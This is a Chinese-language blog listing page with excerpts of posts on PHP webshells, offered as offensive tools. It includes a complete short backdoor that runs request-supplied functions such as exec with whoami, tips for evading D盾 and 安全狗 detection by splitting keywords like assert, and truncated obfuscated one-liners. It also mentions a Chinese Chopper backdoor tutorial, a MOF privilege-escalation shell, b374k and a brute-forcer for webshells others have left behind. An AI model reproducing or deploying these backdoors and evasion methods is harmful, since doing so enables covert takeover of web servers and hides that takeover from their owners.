基于字典的webshell的自动化检测爆破

闲着无聊写了一个,识别率可能不太高,根据常见webshell名称作为字典,探测网站是否有前人留下的webshell,自动化识别,并爆破

webshell的自动化检测爆破

中国制造IOT设备遭恶意软件Mirai感染成为近期DDOS攻击主力

cctv-camera-hacking.png

过D盾,安全狗,一句话

其他waf什么的自己测试

//过D盾过安全狗
 
<?php
error_reporting(0);
$b

绕过安全狗写shell和隐藏后门大马

php免杀方法

个人认为免杀大致分为这几个方面:


1.关键字拆分。

         比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。

服务器上捡的php一句话

<?php 
error_reporting(0); 
set_time_limit(0);
function My_base($data,$key){
        $key=md5($key);
       &

2款不易查杀的PHP一句话后门

<?php

//door.php?ctime=exec&atime=whoami

@extract ($_REQUEST);
@die ($ctime($atime));
?>
<?php
//door.php?p={"a":&

中国菜刀300万高级后门箱子制作教程

中国菜刀后门

【国内首发】PHP木马-php_mof SHELL

php木马 国内首发php_mof SHELL

增加mof双重提权:支持shell.users组件提权和wscript.shell执行命令

双mof提权.png

b374k-3.2.3

b374k-3.2.3